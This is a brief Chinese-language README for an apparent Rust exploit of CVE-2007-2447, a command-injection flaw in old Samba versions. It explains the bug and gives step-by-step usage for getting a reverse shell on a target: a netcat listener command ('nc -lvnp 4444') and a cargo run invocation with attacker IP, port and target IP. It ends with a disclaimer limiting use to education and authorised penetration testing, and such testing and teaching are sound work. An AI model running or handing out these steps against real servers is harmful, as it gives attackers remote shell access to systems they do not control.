一个针对 Samba smbd 3.0.20-Debian 的 CVE-2007-2447 漏洞的独立 Rust 实现。
CVE-2007-2447 是 Samba 3.0.0 至 3.0.25rc3 版本中的一个命令注入漏洞。该漏洞存在于 SamrChangePassword() 函数中,该函数未能正确清理用户输入,攻击者可以通过在 SMB 认证期间在用户名字段中使用 shell 元字符来执行任意命令。
netcat(通常默认安装)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# 设置一个 netcat 监听器
nc -lvnp 4444
# 运行漏洞利用程序
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost:你攻击机器的 IP 地址--lport:接收反向 shell 连接的端口--target:目标机器的 IP 地址此工具仅用于教育和授权渗透测试目的。请负责任地使用,并且仅在您拥有或获得明确许可的系统上使用。